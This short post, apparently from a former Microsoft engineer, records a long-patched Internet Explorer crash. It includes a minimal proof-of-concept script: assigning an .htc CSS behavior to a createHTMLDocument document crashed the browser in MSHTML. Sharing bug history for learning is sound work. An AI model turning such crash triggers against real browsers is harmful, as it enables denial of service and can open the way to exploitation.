Assigning a CSS behavior (.htc file) to an element in a document created with document.implementation.createHTMLDocument crashed the browser.

<script>
function main()
{
    var myDoc = document.implementation.createHTMLDocument("TITLE");
    myDoc.documentElement.style.behavior = "url(htc.htc)";
}
</script>
<input type="button" value="crashMe" onclick="main()" />

The fault landed in MSHTML!CGenericElement::Notify. The HTC file only needed to contain an opening <PUBLIC:COMPONENT /> tag to trigger the crash.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.